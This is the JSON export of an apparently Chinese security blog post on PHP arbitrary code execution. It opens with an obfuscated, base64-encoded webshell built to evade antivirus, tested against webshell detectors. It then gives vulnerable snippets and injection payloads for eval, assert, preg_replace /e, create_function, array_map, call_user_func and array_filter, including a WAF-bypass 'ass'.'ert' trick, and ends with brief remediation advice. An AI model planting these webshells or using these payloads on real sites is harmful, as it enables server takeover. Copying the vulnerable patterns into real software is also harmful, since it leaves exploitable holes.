{"id":41,"date":"2023-03-23T12:32:29","date_gmt":"2023-03-23T04:32:29","guid":{"rendered":"http:\/\/123.207.45.199\/?p=41"},"modified":"2026-05-31T21:59:13","modified_gmt":"2026-05-31T13:59:13","slug":"%e4%bb%bb%e6%84%8f%e4%bb%a3%e7%a0%81%e6%89%a7%e8%a1%8c","status":"publish","type":"post","link":"https:\/\/www.redspear.cn\/index.php\/2023\/03\/23\/%e4%bb%bb%e6%84%8f%e4%bb%a3%e7%a0%81%e6%89%a7%e8%a1%8c\/","title":{"rendered":"\u4efb\u610f\u4ee3\u7801\u6267\u884c"},"content":{"rendered":"\n

\u514d\u6740<\/h2>\n\n\n\n
\u4f20\u5165\u53d8\u91cf\u7528base64\u52a0\u5bc6
\u5e76\u5728\u5176\u4e2d\u6dfb\u52a0\u4e00\u4e9b\u4e71\u7801 \u622a\u53d6\u65f6\u7528substr\u4ece\u6b63\u5e38\u4ee3\u7801\u5904\u5f00\u59cb
base64_decode
\u200b
\u5206\u6790\u8681\u5251
\u200b
\u5199\u5165\u6587\u4ef6
fopen fwrite \u4e09\u5143
\u8bfb\u53d6\u6587\u4ef6
fopen fread \u4e09\u5143
\u5220\u9664\u6587\u4ef6\u5939
\u200b
\u9996\u5148\uff1a\u5224\u65ad\u662f\u5426\u662f\u4e00\u4e2a\u6587\u4ef6\u5939
\u5982\u679c\u662f\u6587\u4ef6\u5939\uff0c\u90a3\u4e48\u5c31\u9700\u8981\u904d\u5386\u91cc\u9762\u7684\u6587\u4ef6.
\u6ce8\u610f\u4e8b\u9879\u5982\u679c\u904d\u5386\u7684\u662f.\u6216\u8005..\u90a3\u4e48\u5c31\u4e0d\u6267\u884c\u5220\u9664\u6307\u4ee4)
\u904d\u5386\u5230\u975e.\u6216\u8005\u975e..\u5728\u53bb\u68c0\u6d4b\u662f\u5426\u662f\u4e00\u4e2a\u6587\u4ef6\uff0c\u5982\u679c\u662f\u4e00\u4e2a\u6587\u4ef6\u90a3\u4e48\u5c31\u6267\u884cunlik\u64cd\u4f5c\uff0c\u904d\u5386\u5230\u6700\u540e\u5728\u6267\u884crmdir\u5220\u9664\u6587\u4ef6\u5939
\u200b
\u200b
\u200b
shell \u547d\u4ee4
\u200b
D\u76fe\u9632\u706b\u5899   \u53ef\u7528\u4e8e\u6d4b\u8bd5\u514d\u6740
\u767e\u5ea6\u5728\u7ebfwebshell\u68c0\u6d4b \u6cb3\u9a6c
\u200b
<?php
function xxx($a){
    return $a;
}
$str = $_GET['cmd'];
\u200b
$x= base64_decode(substr($str,7));
\u200b
$c='x';
$v='xx';
$vg=$c.$v;
$hg=$vg($x);
$hg('phpinfo();');<\/pre>\n\n\n\n
\u539f\u7406<\/h2>\n\n\n\n
\u5728Web\u5e94\u7528\u4e2d\u6709\u65f6\u5019\u7a0b\u5e8f\u5458\u4e3a\u4e86\u8003\u8651\u7075\u6d3b\u6027\u3001\u7b80\u6d01\u6027\uff0c\u4f1a\u5728\u4ee3\u7801\u8c03\u7528eval
\u51fd\u6570(PHP\u51fd\u6570)\u53bb\u5904\u7406\u3002\u6bd4\u5982\u5f53\u5e94\u7528\u5728\u8c03\u7528\u4e00\u4e9b\u80fd\u5c06\u5b57\u7b26\u4e32\u8f6c\u5316\u6210\u4ee3\u7801\u7684\u51fd\u6570\u65f6
\u6ca1\u6709\u8003\u8651\u7528\u6237\u662f\u5426\u80fd\u63a7\u5236\u8fd9\u4e2a\u5b57\u7b26\u4e32\uff0c\u5c06\u9020\u6210\u4ee3\u7801\u6267\u884c\u6f0f\u6d1e\u3002<\/pre>\n\n\n\n
\u76f8\u5173\u51fd\u6570<\/h2>\n\n\n\n
Eval()       \u662f\u4e00\u4e2a\u8bed\u8a00\u6784\u9020\u5668\u800c\u4e0d\u662f\u4e00\u4e2a\u51fd\u6570\uff0c\u4e0d\u80fd\u88ab\u53ef\u53d8\u51fd\u6570\u8c03\u7528
assert()    \u5728PHP7\u4ee5\u524dassert\u662f\u4f5c\u4e3a\u51fd\u6570\u3002PHP7\u4ee5\u540e\uff0cassert\u4e0eeval\u4e00\u6837\u3002\u90fd\u662f\u8bed\u8a00\u6784\u9020\u5668\u3002
preg_replace() +\/e\u6a21\u5f0f
create_function()
array_map ()
call_user_func()
array_filter()
usort_()  uasort (
GET['a']($GET['b']);\/\/a=assert&b=phpinfo (<\/pre>\n\n\n\n
eval<\/h3>\n\n\n\n
\u4f1a\u6709\u4e00\u4e9b\u9650\u5236
${}     \u4f1a\u4f18\u5148\u6267\u884c
\u95ed\u5408+\u6ce8\u91ca   %23
\u200b
1. ');phpinfo();#
<?php
\/\/\u5173\u95ed\u65b9\u6cd5
 $data=$_GET[\u2018data\u2019];
 eval(\u201c\\$ret = strtolower(\u2018$data\u2019);\u201d);
 echo $ret;
?>
\u200b
2. \");phpinfo();%23
<?php
$data=$_GET['data'];
eval(\"\\$ret = strtolower(\\\"$data\\\");\"); 
echo $ret;
?>
\u200b
3.<\/pre>\n\n\n\n
assert<\/h3>\n\n\n\n
\u52a8\u6001\u8c03\u7528\u4e0d\u80fd\u8d85\u8fc77.1<\/p>\n\n\n\n
\u52a8\u6001\u8c03\u7528\u7ed5\u8fc7waf<\/p>\n\n\n\n
$a='ass'
$b='ert';
$c=$a.$b;
$c($_GET['cmd']);<\/pre>\n\n\n\n
preg_replace()<\/h3>\n\n\n\n
\u4e0d\u80fd\u8d85\u8fc75.6<\/p>\n\n\n\n
\u7b2c\u4e00\u4e2a\u53c2\u6570\u8981\u6709 \/e
\u7b2c\u4e8c\u4e2a\u53c2\u6570\u662f\u5426\u53ef\u63a7       =>\u66ff\u6362\u6210\u4f55\u503c
\u7b2c\u4e09\u4e2a\u53c2\u6570\u5e94\u8be5\u5305\u542b\u7b2c\u4e00\u4e2a\u53c2\u6570  
\u200b
1.phpinfo()
<?php
$a = $_GET['a'];
echo preg_replace(\"\/test\/e\", $a, \"just test!\")
?>
\u200b
2. <data>${phpinfo()};<\/data>
<?php
$data=$_GET['data'];
echo $data;
preg_replace('\/<data>(.*)<\\\/data>\/e', '$ret=\"\\\\1\";', $data);
echo $ret;
?><\/pre>\n\n\n\n
create_function()<\/h3>\n\n\n\n
\u4e5f\u53ef\u52a8\u6001\u8c03\u7528 7.2\u4ee5\u4e0b\u9002\u7528 8.0\u79fb\u9664<\/p>\n\n\n\n
create_function('$a,$b',$c)\u76f8\u5f53\u4e8e
create_function($a,$b){c}
\u6240\u4ee5\u95ed\u5408\u65f6\u8981\u8bb0\u5f97{}.
1.\"],phpinfo());}\/*
<?php
error_reporting(0);
$sort_by = $_GET['sort_by'];
$sorter = 'strnatcasecmp';
$sort_function = ' return 1 * ' . $sorter . '($a[\"' . $sort_by . '\"], $b[\"' . $sort_by . '\"]);';
$func = create_function('$a,$b', $sort_function);
$func(1,$sort_by);
?><\/pre>\n\n\n\n
array_map()<\/h3>\n\n\n\n
$a=[$_GET['cmd']];
$b = array_map('assert', $a);
print_r($b);
\u76f8\u5f53\u4e8e assert($a);
\u200b
1. func=assert&cmd=phpinfo();
<?php
$func = $_GET['func'];
$cmd = $_GET['cmd'];
$array[0] = $cmd;
$new_array = array_map($func, $array);
echo $new_array;<\/pre>\n\n\n\n
call_user_func<\/h3>\n\n\n\n
\u628a\u7b2c\u4e00\u4e2a\u53c2\u6570\u4f5c\u4e3a\u56de\u8c03\u51fd\u6570\u8c03\u7528<\/p>\n\n\n\n
\u5176\u4f59\u53c2\u6570\u662f\u56de\u8c03\u51fd\u6570\u7684\u53c2\u6570<\/p>\n\n\n\n
call_user_func_array<\/p>\n\n\n\n
\u7248\u672c\u7686\u9002\u7528<\/p>\n\n\n\n
1.\n<?php\ncall_user_func(\"assert\",$_GET['cmd']);<\/pre>\n\n\n\n
array_filter()<\/h3>\n\n\n\n
\u6570\u7ec4,\u56de\u8c03\u51fd\u6570<\/p>\n\n\n\n
\u7248\u672c\u7686\u9002\u7528<\/p>\n\n\n\n
1.\n<?php\nhighlight_file(__FILE__);\n$array[0] = $_GET['a'];\narray_filter($array,'assert');\n?><\/pre>\n\n\n\n
\u8865\u5145<\/p>\n\n\n\n
$_GET['a']($_GET['b']);\n\nusort\n$a=['hehe',$GET['a'],'haha'];\nfunction xxx($num1,$num2)\n{\nassert($num1);\nreturn -1;\n}\nusort($a,\"xxx\");  <\/pre>\n\n\n\n
\u6f0f\u6d1e\u4fee\u590d\u65b9\u6848<\/h3>\n\n\n\n
\u5bf9\u4e8eeval()\u7b49\u51fd\u6570\u4e00\u5b9a\u8981\u4fdd\u8bc1\u7528\u6237\u4e0d\u80fd\u8f7b\u6613\u63a5\u89e6eval\u6216\u8005\u5176\u4ed6\u4ee3\u7801\u6267\u884c\u7684\u7684\n\u53c2\u6570\u6216\u8005\u7528\u6b63\u5219\u4e25\u683c(preg replace\/e)\u5224\u65ad\u8f93\u5165\u7684\u6570\u636e\u683c\u5f0f\u3002\n\n\u5bf9\u4e8e\u5b57\u7b26\u4e32\u4e00\u5b9a\u8981\u4f7f\u7528\u5355\u5f15\u53f7\u5305\u88f9\u53ef\u63a7\u4ee3\u7801\uff0c\u5e76\u4e14\u63d2\u5165\u524d\u8fdb\u884caddslashes()\n\n\u5bf9\u4e8epreg_replace\u653e\u5f03\u4f7f\u7528e\u4fee\u9970\u7b26\u3002\u5982\u679c\u5fc5\u987b\u8981\u7528e\u4fee\u9970\u7b26\uff0c\u8bf7\u4fdd\u8bc1\u7b2c\u4e8c\u4e2a\n\u53c2\u6570\u4e2d\u4e0d\u53ef\u63a7\uff0c\u5bf9\u4e8e\u6b63\u5219\u5339\u914d\u51fa\u7684\u5bf9\u8c61\uff0c\u7528\u5355\u5f15\u53f7\u5305\u88f9<\/pre>\n\n\n\n
<\/p>\n","protected":false},"excerpt":{"rendered":"
\u514d\u6740 \u4f20\u5165\u53d8\u91cf\u7528base64\u52a0\u5bc6\u5e76\u5728\u5176\u4e2d\u6dfb\u52a0\u4e00\u4e9b\u4e71\u7801 \u622a\u53d6\u65f6\u7528substr\u4ece\u6b63\u5e38\u4ee3\u7801\u5904\u5f00\u59cbbase64_dec … <\/p>\n","protected":false},"author":3,"featured_media":27,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[1],"tags":[],"class_list":["post-41","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-webtob10"],"_links":{"self":[{"href":"https:\/\/www.redspear.cn\/index.php\/wp-json\/wp\/v2\/posts\/41","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.redspear.cn\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.redspear.cn\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.redspear.cn\/index.php\/wp-json\/wp\/v2\/users\/3"}],"replies":[{"embeddable":true,"href":"https:\/\/www.redspear.cn\/index.php\/wp-json\/wp\/v2\/comments?post=41"}],"version-history":[{"count":1,"href":"https:\/\/www.redspear.cn\/index.php\/wp-json\/wp\/v2\/posts\/41\/revisions"}],"predecessor-version":[{"id":42,"href":"https:\/\/www.redspear.cn\/index.php\/wp-json\/wp\/v2\/posts\/41\/revisions\/42"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.redspear.cn\/index.php\/wp-json\/wp\/v2\/media\/27"}],"wp:attachment":[{"href":"https:\/\/www.redspear.cn\/index.php\/wp-json\/wp\/v2\/media?parent=41"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.redspear.cn\/index.php\/wp-json\/wp\/v2\/categories?post=41"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.redspear.cn\/index.php\/wp-json\/wp\/v2\/tags?post=41"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}